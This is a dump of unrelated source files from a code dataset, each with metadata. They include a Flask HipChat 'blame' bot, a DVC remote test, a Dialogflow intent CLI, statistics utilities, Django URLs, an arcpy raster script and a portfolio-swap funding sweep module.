crayons to explain this to you.\"\n]\napp = Flask(__name__)\n\n@app.route(\"/\", methods=['GET'])\ndef hello():\n return \"Hello World!\"\n\n@app.route(\"/\", methods=['POST'])\ndef blame():\n request_data = to_json(request)\n \n requesters_room = _extract_requesters_room(request_data)\n arguments = _extract_arguments(request_data)\n requester = _extract_requester(request_data)\n \n guilty = None\n for argument in arguments:\n if '@' in argument:\n guilty = argument\n \n if not guilty:\n members = hipchat_client.get_room_members(requesters_room)\n \n guilty = '@' + random.choice(members) if members else 'all'\n \n if '--with-violence' in arguments:\n message = 'Hey ' + guilty + ' ! ' + random.choice(INSULTS) + ' (megusta)'\n elif '-h' in arguments or '--help' in arguments:\n message = \"@\" + requester + \" I have neither the time nor the crayons to explain this to you.\"\n elif 'why' in arguments:\n message = \"Because !!!!! https://labibliothequedaelinel.files.wordpress.com/2016/10/image.gif?w=656\"\n else:\n message = 'I blame ' + guilty + ' ! >:-('\n \n return jsonify({\n \"color\": \"red\",\n \"message\": message,\n \"notify\": False,\n \"message_format\": \"text\"\n })\n \ndef to_json(request):\n return json.loads(request.data)\n\ndef _extract_arguments(request_data):\n command = request_data['item']['message']['message']\n\n return command.split(' ')[1:]\n\n\ndef _extract_requester(request_data):\n return request_data['item']['message']['from']['mention_name']\n\n\ndef _extract_requesters_room(request_data):\n return request_data['item']['room']['id']\n\nif __name__ == \"__main__\":\n app.debug = True\n app.run(host=os.getenv('IP', '0.0.0.0'), port=int(os.getenv('PORT', '8080')))","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":4521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"427544139","text":"import os\n\nfrom dvc.utils.fs import move, remove\n\n\nclass TestRemote:\n def test(self, tmp_dir, dvc, remote): # pylint: disable=W0613\n (stage,) = tmp_dir.dvc_gen(\"foo\", \"foo\")\n out = stage.outs[0]\n cache = out.cache_path\n foo_hash = out.hash_info\n foo_hashes = out.get_used_objs().get(None, set())\n\n (stage_dir,) = tmp_dir.dvc_gen(\n {\n \"data_dir\": {\n \"data_sub_dir\": {\"data_sub\": \"data_sub\"},\n \"data\": \"data\",\n \"empty\": \"\",\n }\n }\n )\n\n out_dir = stage_dir.outs[0]\n cache_dir = out_dir.cache_path\n dir_hash = out_dir.hash_info\n dir_hashes = {dir_hash} | {oid for _, _, oid in out_dir.obj}\n\n def _check_status(status, **kwargs):\n for key in (\"ok\", \"missing\", \"new\", \"deleted\"):\n expected = kwargs.get(key, set())\n assert expected == set(getattr(status, key))\n\n # Check status\n status = dvc.cloud.status(foo_hashes)\n _check_status(status, new={foo_hash})\n\n status_dir = dvc.cloud.status(dir_hashes)\n _check_status(status_dir, new=dir_hashes)\n\n # Move cache and check status\n # See issue https://github.com/iterative/dvc/issues/4383 for details\n backup_dir = dvc.odb.local.cache_dir + \".backup\"\n move(dvc.odb.local.cache_dir, backup_dir)\n status = dvc.cloud.status(foo_hashes)\n _check_status(status, missing={foo_hash})\n\n status_dir = dvc.cloud.status(dir_hashes)\n _check_status(status_dir, missing=dir_hashes)\n\n # Restore original cache:\n remove(dvc.odb.local.cache_dir)\n move(backup_dir, dvc.odb.local.cache_dir)\n\n # Push and check status\n dvc.cloud.push(foo_hashes)\n assert os.path.exists(cache)\n assert os.path.isfile(cache)\n\n dvc.cloud.push(dir_hashes)\n assert os.path.isfile(cache_dir)\n\n status = dvc.cloud.status(foo_hashes)\n _check_status(status, ok={foo_hash})\n\n status_dir = dvc.cloud.status(dir_hashes)\n _check_status(status_dir, ok=dir_hashes)\n\n # Remove and check status\n remove(dvc.odb.local.cache_dir)\n\n status = dvc.cloud.status(foo_hashes)\n _check_status(status, deleted={foo_hash})\n\n status_dir = dvc.cloud.status(dir_hashes)\n _check_status(status_dir, deleted=dir_hashes)\n\n # Pull and check status\n dvc.cloud.pull(foo_hashes)\n assert os.path.exists(cache)\n assert os.path.isfile(cache)\n with open(cache, encoding=\"utf-8\") as fd:\n assert fd.read() == \"foo\"\n\n dvc.cloud.pull(dir_hashes)\n assert os.path.isfile(cache_dir)\n\n status = dvc.cloud.status(foo_hashes)\n _check_status(status, ok={foo_hash})\n\n status_dir = dvc.cloud.status(dir_hashes)\n _check_status(status_dir, ok=dir_hashes)\n","sub_path":"dvc/testing/test_remote.py","file_name":"test_remote.py","file_ext":"py","file_size_in_byte":2945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"222764041","text":"# Problem 015\n# Starting in the top left corner of a 2×2 grid, and only being able to\n# move to the right and down, there are exactly 6 routes\n# to the bottom right corner.\n# How many such routes are there through a 20×20 grid?\nanswer = 137846528820\ntarget = 20\n\n\ndef solution():\n # compute all combinations for 'to right' move. 'Down' movement\n # are complementary.\n\n result = 1\n\n for i in range(1, target + 1):\n result = result * (target + i) // i\n\n return result\n\n\nif __name__ == '__main__':\n from timeit import Timer\n solution_time = Timer(solution).timeit(number=100)\n time = round(solution_time / 100, 4)\n print(f'Correct answer is: \\t\\t{answer}')\n print(f'Solution answer is: \\t{solution()}')\n print(f'Average solution execution time: {time}')\n","sub_path":"015/problem_015.py","file_name":"problem_015.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"177942156","text":"from datetime import datetime\n\nimport cv2\nfrom constants import Direction, COLUMN, TIMEOUT_FOR_TRACKER\nfrom human_tracker import HumanTracker\nfrom human_validator import HumanValidator\nfrom logger import Logger\n\n\nclass HumanTrackerHandler:\n human_tracking_dict = {}\n\n @classmethod\n def draw_id_centroid_on_output_frame(cls, frame, centroid, objectID):\n # draw both the ID of the object and the centroid of the\n # object on the output frame\n text = \"ID {}\".format(objectID)\n cv2.putText(frame, text, (centroid[0] - 10, centroid[1] - 10)\n , cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0), 2)\n cv2.circle(frame, (centroid[0], centroid[1]), 4,\n (0, 255, 0), -1)\n\n @classmethod\n def yield_a_human_tracker_object(cls, objects):\n\n for (objectID, centroid) in objects.items():\n # check to see if a trackable object exists for the current\n # object ID\n human_tracker_object = cls.human_tracking_dict.get(objectID, None)\n\n # if there is no existing trackable object, create one\n if not human_tracker_object:\n Logger.logger().debug(\"Creating a new speed tracker object with object id = {}.\".format(objectID))\n human_tracker_object = HumanTracker(objectID, centroid)\n cls.human_tracking_dict[objectID] = human_tracker_object\n\n else:\n human_tracker_object.centroids.append(centroid)\n human_tracker_object.timestamp_list.append(datetime.now())\n yield human_tracker_object, objectID, centroid\n\n @classmethod\n def clear_object_from_speed_tracking_dict(cls, objectID):\n del (cls.human_tracking_dict[objectID])\n\n @classmethod\n def handle_the_case_where_grace_time_for_tracking_is_over(cls, now, human_tracker_object, keep_dict_items):\n \"\"\"\n This method handles the case where the grace time (TIMEOUT_FOR_TRACKER) for the tracker object is over.\n :param now: timestamp\n :param human_tracker_object: Instance of type HumanTracker.\n :param keep_dict_items: Preserve dictionary items. (for debug purpose)\n :return:\n \"\"\"\n if human_tracker_object.estimated and human_tracker_object.logged and not keep_dict_items:\n # Delete this object from speed tracking dict.\n Logger.logger().debug(\"Deleting objectId {} from the human_tracking_dict.\".format(\n human_tracker_object.objectID))\n cls.clear_object_from_speed_tracking_dict(human_tracker_object.objectID)\n else:\n Logger.logger().debug(\"Computing direction for objectId {} because there are no recorded\"\n \" movements for this object in human_tracking_dict.\".format(\n human_tracker_object.objectID))\n cls.compute_direction(human_tracker_object)\n human_tracker_object.estimated = True\n # Finally log it.\n Logger.logger().debug(\"Perform logging for objectId {} found the human_tracking_dict.\".format(\n human_tracker_object.objectID))\n HumanValidator.validate_column_movement(human_tracker_object, now, None,\n human_tracker_object.objectID)\n\n @classmethod\n def compute_direction_for_dangling_object_ids(cls, keep_dict_items=False):\n \"\"\"\n This method computes direction for dangling objects found in speed_tracking_dict.\n This can happen when the person was tracked only at a few sampling points (column traversal).\n :return:\n \"\"\"\n for object_id, human_tracker_object in cls.human_tracking_dict.copy().items():\n now = datetime.now()\n duration = now - human_tracker_object.timestamp_list[-1]\n if duration.total_seconds() > TIMEOUT_FOR_TRACKER:\n cls.handle_the_case_where_grace_time_for_tracking_is_over(now, human_tracker_object, keep_dict_items)\n\n @classmethod\n def compute_direction(cls, trackable_object):\n \"\"\"\n Compute the direction of the person movement.\n :param trackable_object: object\n :return:\n \"\"\"\n direction = trackable_object.centroids[-1][COLUMN] - trackable_object.centroids[0][COLUMN]\n if direction > 0:\n trackable_object.direction = Direction.ENTER\n else:\n trackable_object.direction = Direction.EXIT\n\n @classmethod\n def record_movement(cls, trackable_object):\n if not trackable_object.estimated:\n cls.compute_direction(trackable_object)\n","sub_path":"Occupancy_Tracker/human_tracker_handler.py","file_name":"human_tracker_handler.py","file_ext":"py","file_size_in_byte":4604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"575473410","text":"def isPalindromes(texts):\n characters = ''''\"!?,.:;'''\n result = []\n for i in range(len(texts)):\n texts[i] = texts[i].lower().replace(' ','')\n for x in range(len(characters)):\n texts[i] = texts[i].replace(characters[x],'')\n if texts[i] == texts[i][::-1]:\n result.append(True)\n else: result.append(False)\n return result\ntexts = [\"Madam, I'm Adam.\",\"rotator\",\"Hello\",\"nurses run\"]\nprint(isPalindromes(texts))\n","sub_path":"구현/이해강_Palindrome.py","file_name":"이해강_Palindrome.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"255733630","text":"import os\nfrom google.cloud import dialogflow\nimport google.api_core.exceptions\nimport json\nimport sys\nimport argparse\nimport uuid\nfrom environs import Env\n\n\nenv = Env()\nenv.read_env()\n\n\ndef parse_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--action',\n dest='action',\n required=True,\n help='action to do'\n )\n\n parser.add_argument(\n '--path',\n dest='path',\n required=False,\n help='Path to json file with intents'\n )\n\n parser.add_argument(\n '--intent_id',\n dest='intent_id',\n required=False,\n help='id intent to delete'\n )\n\n return parser.parse_args()\n\n\ndef list_intents(project_id):\n intents_client = dialogflow.IntentsClient()\n parent = dialogflow.AgentsClient.agent_path(project_id)\n intents = intents_client.list_intents(request={\"parent\": parent})\n\n for intent in intents:\n print(\"=\" * 20)\n print(f\"Intent name: {intent.name}\")\n print(f\"Intent display_name: {intent.display_name}\")\n print(f\"Action: {intent.action}\\n\")\n print(f\"Root followup intent: {intent.root_followup_intent_name}\")\n print(f\"Parent followup intent: \\\n {intent.parent_followup_intent_name}\\n\")\n\n print(\"Input contexts:\")\n for input_context_name in intent.input_context_names:\n print(\"\\tName: {}\".format(input_context_name))\n\n print(\"Output contexts:\")\n for output_context in intent.output_contexts:\n print(\"\\tName: {}\".format(output_context.name))\n\n\ndef create_intent(\n project_id,\n display_name,\n training_phrases_parts,\n message_texts\n):\n\n \"\"\"Create an intent of the given intent type.\"\"\"\n\n intents_client = dialogflow.IntentsClient()\n\n parent = dialogflow.AgentsClient.agent_path(project_id)\n training_phrases = []\n for training_phrases_part in training_phrases_parts:\n part = dialogflow.Intent.TrainingPhrase.Part(\n text=training_phrases_part\n )\n # Here we create a new training phrase for each provided part.\n training_phrase = dialogflow.Intent.TrainingPhrase(parts=[part])\n training_phrases.append(training_phrase)\n\n text = dialogflow.Intent.Message.Text(text=message_texts)\n message = dialogflow.Intent.Message(text=text)\n\n intent = dialogflow.Intent(\n display_name=display_name,\n training_phrases=training_phrases, messages=[message]\n )\n\n response = intents_client.create_intent(\n request={\"parent\": parent, \"intent\": intent}\n )\n\n print(\"Intent created: {}\".format(response))\n\n\ndef delete_intent(project_id, intent_id):\n \"\"\"Delete intent with the given intent type and intent value.\"\"\"\n\n intents_client = dialogflow.IntentsClient()\n intent_path = intents_client.intent_path(project_id, intent_id)\n intents_client.delete_intent(request={\"name\": intent_path})\n\n\ndef read_file(filepath):\n with open(filepath, 'r') as file:\n file_content = json.load(file)\n return file_content\n\n\ndef main():\n project_id = env('PROJECT_ID')\n args = parse_arguments()\n\n if args.action == 'create' and os.path.exists(args.path):\n try:\n intent_content = read_file(args.path)\n except FileNotFoundError:\n sys.exit('File not found. Exit')\n\n for intent in intent_content:\n questions = intent_content[intent]['questions']\n answer = intent_content[intent]['answer']\n try:\n create_intent(project_id, intent, questions, [answer])\n except google.api_core.exceptions.ServiceUnavailable:\n sys.exit(\"Can't reach google service\")\n except google.api_core.exceptions.FailedPrecondition:\n print(f'Failed precondition for intent with name \"{intent}\"')\n continue\n\n elif args.action == 'list':\n list_intents(project_id)\n\n elif args.action == 'delete' and args.intent_id:\n try:\n isinstance(uuid.UUID(args.intent_id), uuid.UUID)\n except ValueError:\n sys.exit('Invalid intent ID')\n delete_intent(project_id, args.intent_id)\n else:\n sys.exit('Invalid arguments')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"intent.py","file_name":"intent.py","file_ext":"py","file_size_in_byte":4262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"468532010","text":"#!/usr/bin/env python\nimport numpy\nimport numpy as np\nimport scipy.special\n\n_alpha = 0.32\n\n\ndef interval(best,lo=np.nan,hi=np.nan):\n \"\"\"\n Pythonized interval for easy output to yaml\n \"\"\"\n return [float(best),[float(lo),float(hi)]]\n\ndef mean_interval(data, alpha=_alpha):\n \"\"\"\n Interval assuming gaussian posterior.\n \"\"\"\n mean =np.mean(data)\n sigma = np.std(data)\n scale = scipy.stats.norm.ppf(1-alpha/2.)\n return interval(mean,mean-scale*sigma,mean+scale*sigma)\n\n\ndef median_interval(data, alpha=_alpha):\n \"\"\"\n Median including bayesian credible interval.\n \"\"\"\n q = [100*alpha/2., 50, 100*(1-alpha/2.)]\n lo,med,hi = numpy.percentile(data,q)\n return interval(med,lo,hi)\n \ndef peak(data, bins=100):\n num,edges = np.histogram(data,bins=bins)\n centers = (edges[1:]+edges[:-1])/2.\n return centers[np.argmax(num)]\n\ndef kde_peak(data, samples=1000):\n \"\"\"\n Identify peak using Gaussian kernel density estimator.\n \"\"\"\n return kde(data,samples)[0]\n\ndef kde(data, samples=1000):\n \"\"\"\n Identify peak using Gaussian kernel density estimator.\n \"\"\"\n # Clipping of severe outliers to concentrate more KDE samples in the parameter range of interest\n mad = np.median(np.fabs(np.median(data) - data))\n cut = (data > np.median(data) - 5. * mad) & (data < np.median(data) + 5. * mad)\n x = data[cut]\n kde = scipy.stats.gaussian_kde(x)\n # No penalty for using a finer sampling for KDE evaluation except computation time\n values = np.linspace(np.min(x), np.max(x), samples) \n kde_values = kde.evaluate(values)\n peak = values[np.argmax(kde_values)]\n return values[np.argmax(kde_values)], kde.evaluate(peak)\n\n\ndef peak_interval(data, alpha=_alpha, samples=1000):\n \"\"\"\n Identify interval using Gaussian kernel density estimator.\n \"\"\"\n peak = kde_peak(data,samples)\n x = np.sort(data.flat); n = len(x)\n # The number of entries in the interval\n window = int(np.rint((1.0-alpha)*n))\n # The start, stop, and width of all possible intervals\n starts = x[:n-window]; ends = x[window:]\n widths = ends - starts\n # Just the intervals containing the peak\n select = (peak >= starts) & (peak <= ends)\n widths = widths[select]\n if len(widths) == 0:\n raise ValueError('Too few elements for interval calculation')\n min_idx = np.argmin(widths)\n lo = x[min_idx]\n hi = x[min_idx+window]\n return interval(peak,lo,hi)\n\ndef min_interval(data, alpha=_alpha):\n x = np.sort(data.flat); n = len(x)\n # The number of entries in the interval\n window = int(np.rint((1.0-alpha)*n))\n # The start, stop, and width of all possible intervals\n starts = x[:n-window]; ends = x[window:]\n widths = ends - starts\n if len(widths) == 0:\n raise ValueError('Too few elements for interval calculation')\n min_idx = np.argmin(widths)\n lo = x[min_idx]\n hi = x[min_idx+window]\n mean = (hi+lo)/2.\n return interval(mean,lo,hi)\n\n\ndef norm_cdf(x):\n # Faster than scipy.stats.norm.cdf\n #https://en.wikipedia.org.wiki/Normal_distribution\n return 0.5*(1 + scipy.special.erf(x/np.sqrt(2)))\n\ndef random_pdf(value,pdf,size=None):\n if size is None: size = 1.0\n cdf = np.cumsum(pdf)\n cdf /= cdf[-1]\n fn = scipy.interpolate.interp1d(cdf, range(0, len(cdf)))\n index = np.rint(fn(np.random.uniform(size=size))).astype(int)\n return value[index]\n\ndef sky(lon=None,lat=None,size=1):\n \"\"\"\n Outputs uniform points on sphere from:\n [0 < lon < 360] & [-90 < lat < 90]\n \"\"\"\n if lon is None:\n umin,umax = 0,1\n else:\n lon = np.asarray(lon)\n lon = np.radians(lon + 360.*(lon<0))\n if lon.size==1: umin=umax=lon/(2*np.pi)\n elif lon.size==2: umin,umax=lon/(2*np.pi)\n else: raise Exception('...')\n \n if lat is None:\n vmin,vmax = -1,1\n else:\n lat = np.asarray(lat)\n lat = np.radians(90 - lat)\n if lat.size==1: vmin=vmax=np.cos(lat)\n elif lat.size==2: vmin,vmax=np.cos(lat)\n else: raise Exception('...')\n\n phi = 2*np.pi*np.random.uniform(umin,umax,size=size)\n theta = np.arcsin(np.random.uniform(vmin,vmax,size=size))\n return np.degrees(phi),np.degrees(theta)\n\nif __name__ == \"__main__\":\n import argparse\n description = \"python script\"\n parser = argparse.ArgumentParser(description=description)\n parser.add_argument('args',nargs=argparse.REMAINDER)\n opts = parser.parse_args(); args = opts.args\n\n import pylab as plt\n ax=plt.subplot(221,projection='aitoff')\n ax.grid(True)\n lon,lat = sky(size=1e3)\n lon,lat= np.radians([lon-360.*(lon>180),lat])\n ax.scatter(lon,lat,marker='.',s=2)\n\n ax=plt.subplot(222,projection='aitoff')\n ax.grid(True)\n lon,lat = sky(size=1e3,lat=[30,45])\n lon,lat= np.radians([lon-360.*(lon>180),lat])\n ax.scatter(lon,lat,marker='.',s=2)\n\n ax=plt.subplot(223,projection='aitoff')\n ax.grid(True)\n lon,lat = sky(size=1e3,lon=[30,45])\n lon,lat= np.radians([lon-360.*(lon>180),lat])\n ax.scatter(lon,lat,marker='.',s=2)\n\n ax=plt.subplot(224,projection='aitoff')\n ax.grid(True)\n lon,lat = sky(size=1e3,lon=[0,45],lat=[30,45])\n lon,lat= np.radians([lon-360.*(lon>180),lat])\n ax.scatter(lon,lat,marker='.',s=2)\n","sub_path":"ugali/utils/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":5266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"468480744","text":"from django.conf.urls import patterns, include\nfrom django.contrib.auth.decorators import login_required as lr\nfrom django.contrib.auth.decorators import permission_required as pr\n\nfrom src import url\nfrom src.vendor.views import MyTemplateView\nfrom .views import IncidenceRestView\nfrom .views import StatisticsRestView\nfrom xilema.views import GenericExcelView\n\n\nanomalies = patterns(\n '',\n url(r'^$',\n lr(MyTemplateView.as_view(\n template_name='incidence/anomalies.html')),\n name='incidencesanomalies', permissions=[\"list_incidences\", \"export_excel\"]))\n\napi = patterns(\n '',\n url(r'^anomalies/$',\n pr('actions.change_actionclient')(IncidenceRestView.as_view()),\n name='anomalies'),\n\n url(r'^statistics/$',\n pr('actions.change_actionclient')(StatisticsRestView.as_view()),\n name='statistics'))\n\nurlpatterns = patterns(\n '',\n url(r'^$',\n lr(MyTemplateView.as_view(\n template_name='incidence/index.html')),\n name='statisticsincidences', permissions=[\"list_incidences\"]),\n\n url(r'^anomalies/',\n include(anomalies, namespace='anomalies')),\n\n url(r'^export/$',\n lr(GenericExcelView.as_view()),\n name='ex'),\n\n url(r'^api/',\n include(api, namespace='api')))\n","sub_path":"src/apps/incidence/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"192536923","text":"import arcpy\nimport os\nimport pandas as pd\nimport re\n\nfrom Dev.create_basemap import get_rasters\n\ndef process_rasters(rasters, summary, field, threshold):\n summary = summary[['scenario_id_raw', field]]\n for i, raster in enumerate(rasters):\n print(\"\\t{}\".format(i))\n raster = arcpy.Raster(raster)\n fields = [f.name for f in arcpy.ListFields(raster)]\n print(fields)\n exit()\n\n if not i:\n running = raster\n else:\n running += raster\n return running > 0\n\ndef get_fields(durations, weights):\n return [\"{}_{}_%ile\".format(d, w) for d in durations for w in weights]\n\n\ndef main():\n combo_dir = os.path.join(\"..\", \"..\", \"aquatic-model-inputs\", \"bin\", \"Intermediate\", \"CombinedRasters\")\n combo_format = re.compile(\"c_(.{2,3})_(\\d{4})$\")\n summary_file = os.path.join(\"Output\", \"test_summary.csv\")\n durations = [\"1-day\", \"90-day\"]\n weights = [\"unweighted\", \"weighted\"]\n regions = ['07']\n threshold = 90\n\n summary = pd.read_csv(summary_file)\n for region in regions:\n years, rasters = get_rasters(combo_dir, combo_format, region)\n for field in get_fields(durations, weights):\n print(region, field)\n combined = process_rasters(rasters, summary, field, threshold)\n combined.save(out_format.format(region, _class, years[0], years[-1]))\n\n\nmain()\n","sub_path":"ScenarioSelection/Dev/map_exceedances.py","file_name":"map_exceedances.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"378803163","text":"\"\"\"-----------------------------------------------------------------------------\nProject: Prime Brokerage Project\nDepartment: Prime Services\nRequester: Francois Henrion\nDeveloper: Paul Jacot-Guillarmod\nCR Number: 666125 (Initial Deployment)\n\nHISTORY\n================================================================================\nDate Change no Developer Description\n--------------------------------------------------------------------------------\n2011-06-17 685737 Paul J.-Guillarmod Added a function call add TPL to the portfolio swap\n2011-12-08 850928 Herman Hoon Added the Provision function call\n2012-05-08 Peter Kutnik Fixed earlier undocumented change for non cash collateral\n2014-11-20 2450799 Peter Fabian Fixing errors and exception handling\n2015-09-11 3090331 Jakub Tomaga Portfolio independent sweeping\n2018-11-12 CHG1001113453 Tibor Reiss Enable fully funded CFD for MMIBETA2\n2019-03-27 FAPE-65 Tibor Reiss Remove fully funded CFD for MMIBETA2 (yes, you are reading it correctly)\n2019-07-15 FAPE-47 Iryna Shcherbina Create a sweeping report\n2019-11-21 FAPE-147 Tibor Reiss Propagate error\n-----------------------------------------------------------------------------\"\"\"\nimport acm\n\nfrom PS_Functions import (CALENDAR, TODAY, START_DATE_KEYS, START_DATE_LIST, END_DATE_KEYS, END_DATE_LIST, DateGenerator)\nimport PS_FundingSweeper\nimport PS_TimeSeriesFunctions\nfrom at_logging import getLogger, bp_start\nfrom sweeping_report import PSwapSweepingReport\n\n\nLOGGER = getLogger()\n\n\ndef enable_custom_start_date(index, field_values):\n ael_variables[2][9] = (field_values[1] == 'Custom Date')\n return field_values\n\n\ndef enable_custom_end_date(index, field_values):\n ael_variables[4][9] = (field_values[3] == 'Custom Date')\n return field_values\n\n\n# Variable Name, Display Name, Type, Candidate Values, Default, Mandatory, Multiple, Description, Input Hook, Enabled\nael_variables = [['portfolioSwaps', 'Portfolio Swaps', 'FInstrument', None, None, 1, 1, 'Portfolio swaps that will have their funding cashflows extended', None, 1],\n ['startDate', 'Start Date', 'string', START_DATE_KEYS, 'Now', 1, 0, 'Date from which the portfolio swaps will be extended.', enable_custom_start_date, 1],\n ['startDateCustom', 'Start Date Custom', 'string', None, TODAY, 0, 0, 'Custom from date', None, 0],\n ['endDate', 'End Date', 'string', END_DATE_KEYS, 'Now', 1, 0, 'Date to which the portfolio swaps will be extended.', enable_custom_end_date, 1],\n ['endDateCustom', 'End Date Custom', 'string', None, TODAY, 0, 0, 'Custom to date', None, 0],\n ['compoundPortfolio', 'Compound Client Portfolio', 'FCompoundPortfolio', None, None, 0, 0, 'Fixed Income ValStart will be calculated for the compound portfolio to select the overnight funding spread.', None, 1],\n ['collateralPortfolios', 'Compound Collateral Portfolio', 'FCompoundPortfolio', None, None, 0, 1, 'Compound portfolio where the Collateral trades are booked.', None, 1],\n ['resweepTPL', 'Re-Sweep TPL', 'string', ['Yes', 'No'], 'No', 1, 0, 'When running backdated sweeping, indicate whether TPL should be reswept', None, 1],\n ['clientName', 'Short name', 'string', None, 'CLIENT', 0, 0],\n ['sweepingReport', 'Sweeping Report', 'string', None, None, 0, 0, 'Report with detailed breakdown of swept amounts', None, 1],\n ]\n\n\ndef ael_main(ael_dict):\n LOGGER.msg_tracker.reset()\n process_name = \"ps.extend_pswap.{0}\".format(ael_dict[\"clientName\"])\n\n with bp_start(process_name): \n if ael_dict['startDate'] == 'Custom Date':\n start_date = ael_dict['startDateCustom']\n else:\n start_date = START_DATE_LIST[ael_dict['startDate']]\n \n if ael_dict['endDate'] == 'Custom Date':\n end_date = ael_dict['endDateCustom']\n else:\n end_date = END_DATE_LIST[ael_dict['endDate']]\n \n resweep_tpl = ael_dict['resweepTPL'] == 'Yes'\n \n portfolio_swaps = ael_dict['portfolioSwaps']\n report_data = {}\n for portfolio_swap in portfolio_swaps:\n report_data[portfolio_swap.Name()] = ExtendPortfolioSwap(\n portfolio_swap, resweep_tpl, start_date, end_date)\n \n collateral_portfolios = ael_dict['collateralPortfolios']\n if portfolio_swaps:\n portfolio_swap = portfolio_swaps[0]\n portfolio = portfolio_swap.FundPortfolio()\n call_account = acm.FDeposit[portfolio.add_info('PSClientCallAcc')]\n if collateral_portfolios:\n collateral_portfolio = collateral_portfolios[0]\n for date in DateGenerator(start_date, end_date):\n _SetCollateralTimeSeries(collateral_portfolio, date, call_account, 'Collateral Value')\n\n report_filename = ael_dict[\"sweepingReport\"]\n if report_filename:\n try:\n file_path = report_filename.format(date=end_date.replace(\"-\", \"\"))\n report = PSwapSweepingReport(file_path, report_data)\n report.create_report()\n LOGGER.info(\"Wrote secondary output to %s\", file_path)\n except Exception:\n LOGGER.exception(\"Sweeping report wasn't generated.\")\n\n if LOGGER.msg_tracker.errors_counter:\n raise RuntimeError(\"ERRORS occurred. Please check the log.\")\n\n LOGGER.info(\"Completed Successfully\")\n\n\ndef _SetCollateralTimeSeries(collateral_portfolio, date, call_account, column_name):\n time_series_dict = {'FI': 'PS_Collateral_FI',\n 'EQ': 'PS_Collateral_EQ',\n 'Cash': 'PS_Collateral_MM'\n }\n collateral_type_grouper = acm.FAttributeGrouper('Instrument.CollateralType')\n query_folder = _GenerateValStartQuery(collateral_portfolio)\n collateral_dict = PS_FundingSweeper.TradingManagerSweeper(query_folder, date, [column_name], False,\n collateral_type_grouper, 'ZAR')\n collateral_dict_keys = iter(collateral_dict.keys())\n\n if collateral_dict_keys:\n for key in collateral_dict_keys:\n time_series_name = time_series_dict[key]\n value = collateral_dict[key]\n if value:\n value = value[0]\n PS_TimeSeriesFunctions.UpdateTimeSeriesValue(time_series_name, call_account, value, date)\n LOGGER.info('Set time series %s, value %s for %s on %s to %s',\n time_series_name, column_name, call_account.Name(), date, value)\n\n\ndef _GenerateValStartQuery(compound_portfolio):\n \"\"\"Generate a query folder that will be used to calculate Overnight Spread ValStart for the compound portfolio.\"\"\"\n query = acm.CreateFASQLQuery('FTrade', 'AND')\n query.AddAttrNode('Status', 'NOT_EQUAL', acm.EnumFromString('TradeStatus', 'Simulated'))\n query.AddAttrNode('Status', 'NOT_EQUAL', acm.EnumFromString('TradeStatus', 'Void'))\n \n # Add the sub portfolios to the query\n or_node = query.AddOpNode('OR')\n if not compound_portfolio.AllPhysicalPortfolios():\n raise ValueError(\"Portfolio %s has no physical subportfolios\" % compound_portfolio.Name())\n for portfolio in compound_portfolio.AllPhysicalPortfolios():\n or_node.AddAttrNode('Portfolio.Name', 'EQUAL', portfolio.Name())\n \n return query\n\n\ndef _CalculateOvernightSpreadValStart(query, date):\n \"\"\"\n Calculate the total value of Overnight Spread ValStart for the previous banking day. This will be\n used to decide on the spread to be used in the overnight funding.\n \"\"\"\n previous_banking_day = CALENDAR.AdjustBankingDays(date, -1)\n total_val_start = 0\n instrument_val_starts = PS_FundingSweeper.TradingManagerSweeper(query, previous_banking_day,\n ['Overnight Spread ValStart'], True)\n for ins, valStartList in instrument_val_starts.items():\n val_start = valStartList[0]\n total_val_start += val_start\n return total_val_start\n\n\ndef ExtendPortfolioSwap(portfolioSwap, resweepTPL, startDate, endDate):\n \"\"\"Run all the modules needed to extend a portfolio swap for each date between startDate and endDate inclusive.\"\"\"\n report_data = {}\n portfolio = portfolioSwap.FundPortfolio()\n for date in DateGenerator(startDate, endDate):\n PS_TimeSeriesFunctions.UpdateTimeSeries('PSExtExecPremRate', 'PSExtExecPremRate', portfolio, date)\n PS_TimeSeriesFunctions.UpdateTimeSeries('PSExtExecPremNonDMA', 'PSExtExecPremNonDMA', portfolio, date)\n PS_TimeSeriesFunctions.UpdateTimeSeries('PSShortPremRate', 'PSShortPremRate', portfolioSwap, date)\n funding = PS_FundingSweeper.GenerateFunding(portfolioSwap, date)\n provision = PS_FundingSweeper.GenerateProvision(portfolioSwap, date)\n\n # In general we don't want to overwrite the historical TPL resets, unless explicitly choosing to do so.\n tpl = {}\n if date == TODAY or resweepTPL:\n tpl = PS_FundingSweeper.GenerateTotalTPL(portfolioSwap, date)\n report_data[date] = (funding, provision, tpl)\n\n return report_data\n","sub_path":"Python modules/PS_ExtendPortfolioSwap.py","file_name":"PS_ExtendPortfolioSwap.py","file_ext":"py","file_size_in_byte":9358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"240046318","text":"'''\r\nCreated on Jun 4, 2012\r\n\r\n@author: Nich\r\n'''\r\n\r\ndirs = {\r\n \"e\" : (1, 0),\r\n \"w\" : (-1, 0),\r\n \"d\" : (0, -1),\r\n \"u\" : (0, 1),\r\n }\r\n\r\ndef add_dirs(*dirs):\r\n res = [0, 0]\r\n for d in dirs:\r\n for i, val in enumerate(d):\r\n 